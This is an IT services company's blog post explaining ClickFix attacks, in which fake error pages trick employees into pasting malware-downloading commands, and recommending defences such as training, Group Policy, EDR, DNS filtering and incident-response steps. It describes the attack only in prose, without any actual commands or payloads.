.webp)
What Is a ClickFix Attack?
Most phishing attacks try to sneak malware past your security tools. ClickFix takes a completely different approach: it convinces your employees to install the malware themselves.
The concept is simple and surprisingly effective. An employee visits what looks like a normal webpage, maybe through a link in an email or a search result. The page displays a fake error message, something like a Cloudflare verification check, a browser update prompt, or an SSL certificate warning. Then it tells the user to "fix" the problem by opening a system tool and pasting a command.
The employee thinks they are completing a routine verification step. What they are actually doing is running a script that downloads malware directly onto their machine. Because the user initiated the action themselves, most endpoint protection tools do not flag it as suspicious.
According to a 2025 Huntress Cyber Threat Report, ClickFix was responsible for more than half of all malware loader activity that year. And in 2026, the technique has gotten significantly more sophisticated.
How ClickFix Works Step by Step
Understanding the mechanics helps you explain it to your team. Here is the typical flow on a Windows machine:
Step 1: The Lure
The employee receives an email or clicks a link that takes them to a page that looks legitimate. Common disguises include fake Cloudflare CAPTCHA pages, browser update notifications, SSL certificate errors, and font installation prompts. Recent campaigns have also impersonated Intuit QuickBooks and Booking.com, which makes them particularly convincing for office workers who use those tools daily.
Step 2: The Fake Error
The page displays a message telling the user something is wrong and needs to be fixed. It might say "Human verification required," "Your browser needs an update," or "Session expired - please verify." The message looks professional and matches the design of whatever service it is impersonating.
Step 3: The Instructions
Instead of asking the user to click a button or download a file (which security tools would catch), the page tells them to:
1. Press Windows + R to open the Run dialog
2. Press Ctrl + V to paste a command (which was silently copied to their clipboard)
3. Press Enter to execute it
Some newer variants spotted by Microsoft in February 2026 switched to Windows + X (which opens the Power User menu) followed by pressing I to launch Windows Terminal. This bypasses detections specifically tuned to the Run dialog.
Step 4: The Payload
The pasted command typically launches PowerShell, downloads a script from an attacker-controlled server, and executes it in memory. The whole process takes seconds. The malware can be an infostealer, a remote access trojan, or ransomware. Recent campaigns have deployed Lumma Stealer, Atomic Stealer, and Venom Stealer variants.
ClickFix Now Targets Mac Users Too
If you think this is just a Windows problem, think again. ClickFix campaigns have been hitting macOS since late 2025, and they are evolving fast.
The original Mac version followed the same playbook: trick the user into opening Terminal and pasting a command. Apple responded in macOS Tahoe 26.4 by adding a warning that blocks pasting suspected malicious commands into Terminal with the message "Possible malware, paste blocked."
But attackers adapted within weeks. Researchers at Jamf found a new variant in April 2026 that sidesteps Terminal entirely. Instead of asking users to paste commands, it uses the applescript:// URL scheme to open Script Editor with a pre-filled script that claims to be a system maintenance tool. The fake script shows a dialog saying "Freed 24.7 GB" while it quietly downloads Atomic Stealer in the background.
The shift from "paste this scary command" to "click this button to clean your Mac" makes the attack even more convincing. Employees who would never open Terminal might happily click a button that promises to free up disk space.
Why Traditional Security Tools Miss ClickFix
This is what makes ClickFix so frustrating from an IT security perspective. The attack is specifically designed to exploit a blind spot in how most security tools work.
Traditional endpoint protection monitors for suspicious processes, malicious files being written to disk, and unusual parent-child process relationships. When malware arrives as an email attachment or a drive-by download, these tools catch it reliably.
But ClickFix flips the model. The user opens a legitimate system tool (Run dialog, PowerShell, Terminal) and manually executes a command. From the security software's perspective, this looks like a normal user action. The malicious script often runs entirely in memory without writing files to disk, which means there is nothing for file-based scanning to detect.
As BlackFog researchers noted about the Venom Stealer kit, the process "appears user-initiated and bypasses detection logic built around parent-child process relationships." Even Chrome's v10 and v20 password encryption gets bypassed using a silent privilege escalation that extracts decryption keys without triggering UAC dialogs.
The Commercialization Problem: ClickFix-as-a-Service
What turned ClickFix from a clever trick into a widespread threat is commercialization. Attackers no longer need to build their own ClickFix infrastructure. They can buy it off the shelf.
The Venom Stealer kit, documented by BlackFog in April 2026, sells as a subscription service starting at $250 per month with lifetime access available for $1,800. It ships with four ready-made templates for both Windows and macOS: a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font installation page.
The kit includes a full operator panel where attackers can customize their campaigns, track infections, and manage stolen data. It even has a 15% affiliate program and a Telegram-based licensing system. This is organized crime with a SaaS business model.
What this means for businesses: the barrier to entry for running ClickFix attacks is now extremely low. You do not need to be a skilled hacker. You need $250 and a Telegram account.
What Gets Stolen in a ClickFix Attack
The damage from a successful ClickFix attack is immediate and comprehensive. Modern infostealers deployed through ClickFix do not just grab one thing. They sweep everything they can find in seconds.
Here is what typically gets exfiltrated:
Browser data: Saved passwords, session cookies, browsing history, autofill data, and stored credit card numbers from every Chromium and Firefox-based browser profile on the machine.
Business application credentials: Login tokens for Microsoft 365, Google Workspace, QuickBooks, banking portals, CRM systems, and any other web application the employee was logged into.
Cryptocurrency wallets: Private keys and seed phrases from browser-based wallet extensions.
System information: Hardware fingerprint, installed software, browser extensions, and network configuration. This gives attackers a complete profile for planning follow-up attacks.
The stolen session cookies are particularly dangerous. An attacker with a valid session cookie can log into your Microsoft 365 or banking portal without needing a password or passing multi-factor authentication. They are already "authenticated" as your employee.
How to Protect Your Business from ClickFix
There is no single fix that stops ClickFix, because the core vulnerability is human behavior. But a layered approach makes a real difference.
Train Your Team on What ClickFix Looks Like
Your employees need to know one simple rule: no legitimate website will ever ask you to open Run, PowerShell, Terminal, or Script Editor and paste a command. That is the red flag. If a webpage asks you to leave your browser and run something on your computer, close the tab immediately.
Include ClickFix examples in your security awareness training. Show your team what fake Cloudflare verifications and browser update prompts look like. The more familiar they are with the trick, the less likely they are to fall for it.
Disable the Windows Run Dialog via Group Policy
If your employees do not need the Run dialog for their daily work (and most do not), you can disable it entirely through Group Policy. Recorded Future recommends this as a key defensive measure. Navigate to User Configuration, Administrative Templates, Start Menu and Taskbar, and enable "Remove Run menu from Start Menu." This blocks the Win+R shortcut that most ClickFix variants rely on.
Enable PowerShell Constrained Language Mode
PowerShell Constrained Language Mode (CLM) restricts what PowerShell scripts can do, blocking access to .NET classes, COM objects, and other features that ClickFix payloads depend on. Combined with application control policies, this significantly limits what a pasted command can accomplish even if an employee does fall for the trick.
Keep macOS Updated
If your office uses Macs, make sure they are running macOS Tahoe 26.4 or later. Apple's new Terminal paste protection is not perfect (attackers are already working around it), but it adds a meaningful speed bump that can stop less sophisticated variants.
Deploy Endpoint Detection and Response (EDR)
While standard antivirus misses ClickFix, a properly configured EDR solution can catch the post-execution behavior: unusual PowerShell activity, connections to known malicious domains, credential harvesting from browser stores, and data exfiltration. EDR monitors behavior patterns rather than just file signatures, which makes it far more effective against living-off-the-land attacks.
Implement DNS Filtering
DNS filtering blocks connections to known malicious domains. Even if an employee runs a ClickFix command, the script cannot download its payload if the domain it reaches out to is blocked at the DNS level. This is one of the most cost-effective layers you can add to your cybersecurity stack.
Use a Password Manager
If your team uses a password manager instead of saving passwords in their browser, a ClickFix infostealer has far less to steal. Browser-saved passwords are the single biggest prize in these attacks. Moving to a dedicated password manager with a separate master password keeps credentials out of the browser's password store entirely.
What to Do If You Suspect a ClickFix Infection
If an employee reports that they followed instructions on a webpage to paste a command into Run, PowerShell, or Terminal, treat it as a confirmed compromise until proven otherwise. Speed matters here.
1. Disconnect the machine from the network immediately. Do not shut it down (you may lose forensic data in memory), but unplug the Ethernet cable and disable Wi-Fi.
2. Force-expire all active sessions for every account that was logged in on that machine. This includes Microsoft 365, Google Workspace, banking portals, and any SaaS applications. Stolen session cookies work until the session is revoked.
3. Reset all passwords stored in the browser on that machine. If the employee used Chrome or Edge with saved passwords, assume every one of those credentials is compromised.
4. Run a full EDR scan on the machine and any other devices that share credentials with the affected user.
5. Check for unauthorized access to email, file shares, and financial accounts. Infostealers often enable follow-up attacks like business email compromise or wire fraud.
6. Report the phishing page to your IT team or managed SOC provider so the domain can be blocked across your network.
Having an incident response plan documented before something happens makes the difference between a contained incident and a full-blown breach.
ClickFix FAQ
Can antivirus software detect ClickFix attacks?
Traditional antivirus has a hard time with ClickFix because the malicious action is initiated by the user through a legitimate system tool. The malware often runs in memory without writing files to disk, which bypasses file-based scanning. EDR solutions that monitor behavioral patterns are more effective because they can detect the suspicious post-execution activity like credential harvesting and data exfiltration, even when the initial command looked legitimate.
What is the difference between ClickFix and regular phishing?
Regular phishing tries to get you to click a malicious link, open an infected attachment, or enter your credentials on a fake login page. ClickFix goes a step further by getting you to execute a command on your own computer, which installs malware directly. This makes it harder for security tools to block because the execution comes from a trusted system process that the user started themselves.
Are small businesses being targeted by ClickFix?
Yes. Recent ClickFix campaigns have specifically impersonated Intuit QuickBooks, which is widely used by small and mid-sized businesses. The commercialization of ClickFix through kits like Venom Stealer (starting at $250/month) means that attackers can target businesses of any size with minimal effort. Small businesses are often more vulnerable because they may lack dedicated security training programs and advanced endpoint protection.
Does multi-factor authentication protect against ClickFix?
MFA protects your login credentials, but ClickFix infostealers also steal active session cookies. An attacker with a stolen session cookie can access your accounts without needing your password or MFA code, because the session is already authenticated. This is why forcing session expiration across all accounts is critical if you suspect a ClickFix infection.
What should I tell my employees about ClickFix?
Keep it simple: no real website will ever ask you to open Run, PowerShell, Terminal, or any system tool and paste a command to complete a verification or fix an error. If a webpage gives you those instructions, close the tab and report it to IT. That one rule covers every ClickFix variant currently in the wild.
Staying Ahead of Social Engineering
ClickFix is a reminder that the most dangerous attacks do not always exploit software vulnerabilities. Sometimes they exploit trust and routine. An employee who has pasted text hundreds of times without a second thought is not going to hesitate when a convincing-looking webpage tells them to do it one more time.
The best defense is a combination of technical controls (Group Policy restrictions, EDR, DNS filtering) and human awareness. Your team does not need to become security experts, they just need to know that one red line: never paste commands from a website into a system tool.
If your business needs help setting up these protections or running security awareness training for your team, Burgi Technologies is happy to help. You can reach us at (949) 381-1010.
